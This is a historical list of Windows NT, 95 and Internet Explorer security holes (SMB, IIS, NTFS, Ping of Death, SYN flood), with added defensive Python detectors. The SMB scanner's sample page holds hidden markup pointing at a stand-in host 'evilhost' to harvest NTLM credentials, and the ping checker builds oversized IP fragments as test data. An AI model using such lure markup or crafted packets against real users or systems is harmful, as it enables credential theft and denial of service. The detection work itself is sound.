NT Holes and Exploits

SMB Win NT 3.5, 3.51, 4.0

session hijacking is possible

ActiveX Systems running ActiveX

controls run with the user's full privileges (there is no sandbox), so a hostile control can do anything the user can

SNA SNA Server 2.11, 3.0

users inherit the first user's permissions on shared folders

ASP Win NT

users can download unprocessed ASP files (the server-side source is disclosed)

CIFS Win NT

is vulnerable to a man-in-the-middle attack

CIFS Win NT

is vulnerable to a fixed-key attack

cpu-hog WinNT

a program can raise its own scheduling priority high enough to starve every other process of CPU cycles

delete WinNT

users can delete files to which they have only read permission

delete Win NT Server 3.5, 3.51, and 4.0

users can delete files on which they hold no permissions at all

DLLs Win NT 3.5, 3.51, 4.0

any user can replace system DLLs with trojaned ones

dns.exe Win NT 4.0

DoS attack on the DNS service is possible

exe control Win NT 3.5?, 3.51?, 4.0

an executable file is run regardless of its extension (the loader goes by the file's contents, not its name)
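
Since the loader trusts the file's contents rather than its name, a filter that only looks at extensions is useless. The check below does what the loader does: it reads the DOS stub, follows e_lfanew at offset 0x3C and looks for the "PE\0\0" signature, then reports files that are PE images but carry a harmless-looking extension. This is an added example, not code from the original page; the sample files are constructed in the block and are not real programs.

```python
import struct

EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".cpl", ".sys", ".ocx"}

def make_pe_image():
    """Constructed minimal PE image (not a real program): a DOS 'MZ' stub
    whose e_lfanew field (offset 0x3C) points at the 'PE\\0\\0' signature."""
    e_lfanew = 0x80
    dos_header = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", dos_header, 0x3C, e_lfanew)
    stub = bytes(dos_header) + b"\x00" * (e_lfanew - len(dos_header))
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 0, 0)   # machine = i386
    return stub + b"PE\x00\x00" + coff

def is_pe_image(data):
    """True if the bytes carry a DOS stub whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def classify(name, data):
    """Judge a file by its contents, the way the NT loader does, and note when
    the extension would have led an extension-based filter astray."""
    dot = name.rfind(".")
    ext = name[dot:].lower() if dot >= 0 else ""
    if is_pe_image(data):
        return "executable" if ext in EXEC_EXTENSIONS else "executable-with-misleading-extension"
    return "not-executable"

# Constructed samples, not real files
SAMPLES = {
    "report.txt": make_pe_image(),        # PE image hiding behind .txt
    "notes.txt": b"just some text\n",
    "tool.exe": make_pe_image(),
    "broken.exe": b"MZ" + b"\x00" * 100,  # DOS stub with no PE header at all
}

def scan(samples):
    """Map each sample name to its classification."""
    return {name: classify(name, data) for name, data in samples.items()}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:12s} {verdict}")
```

The "broken.exe" case matters: a bare MZ stub with no PE header is a 16-bit DOS program at best, so the check deliberately requires the PE signature rather than stopping at "MZ".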

FileManager Win NT 3.51

users can see files in directories they have no access permissions for

find NT 4.0 (workstation), Windows '95

users can bypass policy settings

Front Page Win NT 4.0 Front Page V1.1

the IUSR account has Full Control over _vti_bin and shtml.exe, which may give intruders write access to an executable directory

FTP Win NT 3.5, 3.51, 4.0
Passive connection support

attack via passive-mode (PASV) connection support

IE Windows '95, NT

a web page can execute commands on the user's machine

IE Win '95, Win NT, Win '97 (Memphis), IE 3.0

via CIFS, program code held on a remote machine can be run on the user's machine

IE Windows '95, Internet Explorer v3.01

.ISP files can be executed on the user's machine

IE Windows 95

.bat files can be run on the user's machine (maybe)

IE Win NT, Internet Explorer 3.01
(possibly earlier versions)

will send the user's encrypted (NTLM) password to SMB servers without warning

IE Win NT

NTLM-encrypted passwords are sent automatically to any SMB server a page references
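
The two IE entries above describe the same trap: any page element that makes Windows open an SMB connection (a file:// URL with a host part, or a \\host\share UNC path) causes the client to authenticate with NTLM without asking. A defender reviewing pages, mail or proxy logs wants to spot such references before a user's browser does. The scanner below walks an HTML document and reports every attribute that would trigger an outbound SMB connection to a remote host. This is an added example, not code from the original page; the sample page and the host name "evilhost" are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page (not from any real site): an image and a frame
# that point at an attacker-controlled SMB server, plus harmless references.
SAMPLE_HTML = """
<html><body>
<p>Quarterly report</p>
<img src="file://evilhost/share/pixel.gif" width=1 height=1>
<a href="http://www.example.com/index.html">normal link</a>
<iframe src="\\\\evilhost\\share\\page.html"></iframe>
<a href="file:///C:/local/readme.txt">local file</a>
</body></html>
"""

URL_ATTRIBUTES = {"src", "href", "background", "codebase", "data"}
LOCAL_HOSTS = {"localhost", "127.0.0.1"}

def smb_target(value):
    """Host that Windows would contact over SMB/CIFS (and authenticate to
    with NTLM) if IE fetched this attribute value: a file:// URL with a
    host part or a \\\\host\\share UNC path. None for local files and HTTP."""
    v = value.strip()
    if v.startswith("\\\\"):
        return v[2:].split("\\", 1)[0].lower() or None
    parts = urlsplit(v)
    if parts.scheme == "file" and parts.netloc:
        return parts.netloc.lower()
    return None

class SmbLinkFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and name.lower() in URL_ATTRIBUTES:
                host = smb_target(value)
                if host and host not in LOCAL_HOSTS:
                    self.findings.append((tag, name, host))

def find_smb_references(html):
    """(tag, attribute, host) for every reference that would trigger an
    automatic SMB connection and NTLM authentication to a remote host."""
    finder = SmbLinkFinder()
    finder.feed(html)
    return finder.findings

if __name__ == "__main__":
    for tag, attr, host in find_smb_references(SAMPLE_HTML):
        print(f"<{tag} {attr}=...> would authenticate to SMB host {host}")
```

The 1x1 image is the classic form: the page renders normally and the user sees nothing, yet the client has already handed the attacker a challenge-response pair to crack offline. An http:// link is not reported because IE only auto-authenticates over HTTP to hosts it classes as intranet, which this check does not model.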

IE Win '95

a clear-text password can be obtained

IIS Systems running IIS v1.0

users can execute commands on the web server

IIS Win NT Microsoft Internet Information Server 3.0

ASP pages can access any file on the web server

IIS Win NT 4.0 (server)

users can download ASP source

IIS WinNT Systems running IIS v2

can crash the web server

IIS II WinNT 4.0

DoS attack caused by high system load

IIS NT 4.0, IIS 1.0

users can browse outside of the document root or execute commands on the server

IIS Win NT 3.51, 4.0

Guest access is the same as Domain User

IIS NT 4.0

can create files on the server

IIS Win NT 4.0

can truncate files

IIS Win NT

executes scripts without asking for user authentication

inetinfo.exe Win NT 4.0

DoS attack

MS Access Win NT 3.5, 3.51, 4.0
Access 1.0/2.0

SIDs are exposed

Netware Win 95

shared drive is left open after administrator access

NetShield Win NT 3.51

users can access any machine

NTFS Win NT 3.5, 3.51, 4.0

Linux can mount NTFS volumes and bypass NTFS permissions (requires the ability to boot the machine from other media)

ntfsdos.exe Win NT 3.5, 3.51, 4.0

can bypass NTFS security entirely (requires booting the machine into DOS)

passwd Win NT 3.5, 3.51, 4.0

password changes can be hijacked and the clear-text values logged

SMB Win NT 3.5, 3.51, 4.0

an SMB server can ask the client for its clear-text password

Password caching Win 95, WfW

user passwords are saved on the hard drive in a weakly protected, crackable format

Ping Win NT 3.51, 4.0
Ping Of Death

oversized ICMP echo packets (fragments that reassemble to more than the 65535-byte IP maximum) can crash the system
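
The crash comes from reassembly, not from any single packet: each fragment is legal on its own, but the last one's offset plus its length lands past the 65535-byte limit of an IP datagram and overruns the reassembly buffer. The check below parses raw IPv4 fragment headers, tracks the highest byte each datagram would write, and flags the ones that exceed the limit. This is an added example, not code from the original page; the packets are constructed in the block (no checksums, fixed 10.0.0.1 -> 10.0.0.2 addresses) and are not a real capture.

```python
import struct
from collections import defaultdict

IPV4_MAX_DATAGRAM = 65535   # the 16-bit total-length field cannot describe more
IPV4_HEADER_LEN = 20

def build_fragment(ident, offset_units, more_fragments, payload):
    """Constructed IPv4 fragment carrying ICMP (proto 1). No checksum; the
    reassembly check below never looks at it."""
    total_len = IPV4_HEADER_LEN + len(payload)
    flags_frag = ((1 if more_fragments else 0) << 13) | (offset_units & 0x1FFF)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ident, flags_frag,
                         64, 1, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return header + payload

def parse_fragment(packet):
    """Pull the fields reassembly needs out of a raw IPv4 header."""
    fields = struct.unpack("!BBHHHBBH4s4s", packet[:IPV4_HEADER_LEN])
    ver_ihl, _tos, total_len, ident, flags_frag, _ttl, proto, _csum, src, dst = fields
    ihl = (ver_ihl & 0x0F) * 4
    return {"key": (src, dst, ident, proto),
            "offset": (flags_frag & 0x1FFF) * 8,    # offset is in 8-byte units
            "mf": bool(flags_frag & 0x2000),
            "data_len": total_len - ihl}

def reassembled_sizes(packets):
    """Highest payload byte any fragment of each datagram would write."""
    end = defaultdict(int)
    for pkt in packets:
        f = parse_fragment(pkt)
        end[f["key"]] = max(end[f["key"]], f["offset"] + f["data_len"])
    return end

def oversized_idents(packets):
    """IP identification values of datagrams whose fragments would reassemble
    past 65535 bytes (header included): the Ping of Death condition."""
    return sorted(ident for (_s, _d, ident, _p), e in reassembled_sizes(packets).items()
                  if e + IPV4_HEADER_LEN > IPV4_MAX_DATAGRAM)

def sample_packets():
    # ident 1: an ordinary 3060-byte ping split into 1480-byte fragments
    normal = [build_fragment(1, 0, True, b"A" * 1480),
              build_fragment(1, 185, True, b"A" * 1480),
              build_fragment(1, 370, False, b"A" * 100)]
    # ident 2: final fragment at offset 8189*8 = 65512 with 1000 bytes of data
    pod = [build_fragment(2, 0, True, b"B" * 1480),
           build_fragment(2, 8189, False, b"B" * 1000)]
    return normal + pod

if __name__ == "__main__":
    print("oversized datagram ids:", oversized_idents(sample_packets()))
```

Note that the offending fragment announces only 1000 bytes of data; a filter that drops "big packets" never sees anything unusual. The only reliable test is offset plus length, which is what the reassembler itself should have checked.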

Registry Win NT 3.5, 3.51, 4.0

is open to guest access

Registry Win NT 3.5, 3.51, 4.0

.REG files update the system registry automatically when opened

RevertToSelf Win NT 3.5, 3.51, 4.0

a call to RevertToSelf() drops the impersonated IUSR_MACHINENAME identity, so the code runs as the SYSTEM account

rollback.exe NT 3.5, 3.51, 4.0

runs without warning and resets the registry

rollback.exe Win NT 3.5, 3.51, 4.0

can be executed by crashing the system

rpcss.exe Win NT 3.51, 4.0

can be driven to 100% CPU utilization

Samba WfW, Win 95

if unpassworded shares are enabled, the entire drive may be accessed

shade Win NT

does not unmount encrypted volumes when the user logs out

SID Win NT

can be duplicated in special cases

SMB Win NT 3.5, 3.51, 4.0

can force clear-text passwords

SMB Win NT 3.5, 3.51

can crash the server by sending "Dir ..\"

Screen saver Win 95

the screen saver lock can be bypassed

Shockwave Win 95/NT/Mac with Netscape and Shockwave
There may be other browsers/platforms affected by similar insecurities

can read the user's email

SYN Win NT 3.51, 4.0

NT SYN flood attack (half-open connections exhaust the listen queue)
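
A SYN flood is visible before the listen queue fills: many SYNs arrive for one port from sources that never send the third-step ACK. The detector below replays a list of TCP segment summaries, keeps a per-port table of half-open SYNs, retires an entry when its source completes the handshake, and raises an alert when the table grows past a threshold inside a time window. This is an added example, not code from the original page; the segment list is constructed in the block (spoofed 10.9.x.y sources, a 192.168.1.10 target) and is not a real capture.

```python
from collections import defaultdict

# Constructed TCP segment summaries: (time_s, src, dst, dport, flags).
# Not a real capture. The 1.1.1.x hosts complete their handshakes; the
# 10.9.x.y addresses are spoofed sources that never answer the SYN/ACK.
def sample_segments():
    segs = []
    for i, src in enumerate(["1.1.1.1", "1.1.1.2", "1.1.1.3"]):
        segs.append((0.10 * i, src, "192.168.1.10", 80, "S"))
        segs.append((0.10 * i + 0.05, src, "192.168.1.10", 80, "A"))
    for n in range(25):
        segs.append((1.0 + 0.01 * n, f"10.9.{n // 256}.{n % 256}", "192.168.1.10", 80, "S"))
    segs.append((2.0, "1.1.1.9", "192.168.1.10", 25, "S"))   # one stray SYN to SMTP
    return sorted(segs)

def detect_syn_floods(segments, window=1.0, threshold=10):
    """Return the (dst, port) pairs that accumulate more than `threshold`
    half-open SYNs within `window` seconds. A SYN is retired when the same
    source later sends a bare ACK (third handshake step) to that dst/port."""
    pending = defaultdict(dict)   # (dst, port) -> {src: time of SYN}
    alerts = set()
    for t, src, dst, port, flags in segments:
        key = (dst, port)
        if flags == "S":
            pending[key][src] = t
            # SYNs older than the window have timed out or were retransmits
            for stale in [s for s, ts in pending[key].items() if t - ts > window]:
                del pending[key][stale]
            if len(pending[key]) > threshold:
                alerts.add(key)
        elif "A" in flags and "S" not in flags:
            pending[key].pop(src, None)
    return alerts

if __name__ == "__main__":
    for dst, port in sorted(detect_syn_floods(sample_segments())):
        print(f"SYN flood suspected against {dst}:{port}")
```

The threshold should sit just above the listening socket's backlog; on the NT versions listed here that queue was small, which is why a handful of spoofed SYNs per second was enough.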

Win32K Win NT 4.0

programs can crash the system

WebSite WinNT, Win95 WebSite 1.1

the CGI examples allow any command to be executed

Questions? Comments?
Mail: Kill9